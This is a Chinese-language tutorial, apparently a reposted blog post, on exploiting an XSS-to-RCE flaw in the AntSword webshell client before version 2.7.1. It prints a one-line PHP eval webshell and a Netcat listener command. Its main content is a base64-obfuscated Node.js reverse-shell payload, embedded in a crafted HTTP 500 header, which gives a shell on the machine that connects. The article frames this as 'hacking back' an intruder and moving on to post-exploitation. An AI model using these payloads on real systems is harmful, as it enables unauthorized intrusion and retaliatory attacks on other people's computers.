中國(guó)蟻劍(AntSword) 是一款開(kāi)源的跨平臺(tái)網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測(cè)試安全人員以及進(jìn)行常規(guī)操作的網(wǎng)站管理員。

WebShell

WebShell可以理解為網(wǎng)頁(yè)中的木馬程序，通過(guò)植入到你的web站點(diǎn)，在web頁(yè)面上的操作，控制你的計(jì)算機(jī)操作系統(tǒng)，文件，權(quán)限，任意命令執(zhí)行。

常見(jiàn)的WebShell分為大馬、小馬、一句話木馬、內(nèi)存馬等。

下面為一句話木馬的代碼展示：

# 一句話木馬
<?php @eval($_POST['pass']); ?>

中國(guó)蟻劍(AntSword)

當(dāng)你的計(jì)算機(jī)被植入了一句話木馬后，需要通過(guò)工具進(jìn)行連接，才可以方便管理，而AntSword就是連接一句話木馬工具中的其中之一，類似的工具還有：中國(guó)菜刀、哥斯拉、冰蝎等。

中國(guó)蟻劍(AntSword) RCE漏洞

此漏洞在AntSword2.7.1版本上修復(fù) ，所以適用于AntSword2.7.1以下版本。

此漏洞為AntSword連接WebShell失敗時(shí)對(duì)html代碼的解析，導(dǎo)致xss漏洞，而使html代碼不在瀏覽器解析而是在服務(wù)器上解析的話需要用到nodejs，所以AntSword使用了nodejs，本文章就講解利用xss漏洞執(zhí)行并調(diào)用nodejs的庫(kù)反彈shell拿到權(quán)限。

吊打黑客的場(chǎng)景

黑客在你的web服務(wù)上植入了WebShell，利用蟻劍去連接并控制了你的電腦，這時(shí)被你發(fā)現(xiàn)了電腦被控制 變的卡卡的，并且發(fā)現(xiàn)了是通過(guò)web服務(wù)里的WebShell來(lái)控制你的，想到自己磁盤(pán)里幾十G的秘密學(xué)習(xí)資料可能全部被竊取，你很不爽，你想找到這個(gè)黑客小子，絞盡腦汁想了很多辦法也無(wú)法痛快的還擊，直到你想起來(lái)以前讀到過(guò)的我這篇文章，你抱著試試看的態(tài)度去嘗試了一下，發(fā)現(xiàn)成功反向黑掉了那個(gè)黑客的電腦，于是你對(duì)這個(gè)黑客一系列的還擊計(jì)劃開(kāi)始在腦海里活蹦亂跳...

模擬環(huán)境準(zhǔn)備：

黑客ip： 192.168.31.124 系統(tǒng): win7

被攻擊的ip：192.168.31.222 系統(tǒng)：win10

黑客電腦軟件：

中國(guó)蟻劍AntSword2.7.0

中國(guó)蟻劍加載器AntSword-Loader2.0.1

被攻擊電腦軟件

小皮面板Phpstudy

瑞士軍刀Netcat

被攻擊電腦web部署

1. 安裝好phpstudy并運(yùn)行apache

2. 打開(kāi)80端口的網(wǎng)站目錄 并放入一句話木馬WebShell文件

黑客電腦連接WebShell

此時(shí)我們作為被攻擊的電腦，可以嘗試修改WebShell的代碼

1. 將一句話木馬代碼改為如下：

<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>

2. 黑客電腦重新連接一句話木馬查看效果

發(fā)現(xiàn)執(zhí)行了我們修改的代碼中的alert(1) 彈出了提示框，證明是存在xss漏洞的

利用nodejs庫(kù)編寫(xiě)payload，反彈黑客電腦的shell

使用<=AntSword2.7.0 RCE漏洞，讓黑客電腦反彈shell到被攻擊電腦的1971端口上

1. 首先開(kāi)啟被攻擊電腦的Netcat 監(jiān)聽(tīng)端口1971

nc -Lp 1971

2. 更改shell.php代碼

利用nodejs庫(kù)反彈shell的代碼(payload)：

var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){
    socket.pipe(cmd.stdin);
    cmd.stdout.pipe(socket);
    cmd.stderr.pipe(socket);
});

以上代碼通過(guò)創(chuàng)建Socket來(lái)連接192.168.31.222(被攻擊的電腦ip) 的1971端口(Netcat監(jiān)聽(tīng)的端口)

將以上代碼進(jìn)行base64加密，加密后的密文：

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7

通過(guò)javascript的eval函數(shù)來(lái)調(diào)用：

eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())

并替換掉我們前邊寫(xiě)的alert(1)代碼,最終寫(xiě)到shell.php中的代碼如下：

<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>

3. 黑客電腦嘗試重新連接一句話木馬，查看效果

黑客使用蟻劍重連，在報(bào)錯(cuò)的同時(shí)，反彈給了我們一個(gè)shell到Netcat監(jiān)聽(tīng)的1971端口上

利用shell執(zhí)行命令，查看信息，成功拿下黑客電腦的管理員賬號(hào)，ip也對(duì)應(yīng)黑客電腦的192.168.31.124

至此，你終于可以對(duì)黑客發(fā)起反擊，進(jìn)行后滲透...文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-647256.html

在該漏洞問(wèn)題被提出之后，中國(guó)蟻劍的作者在及時(shí)發(fā)布了中國(guó)蟻劍的新版本 AntSword v2.7.1+。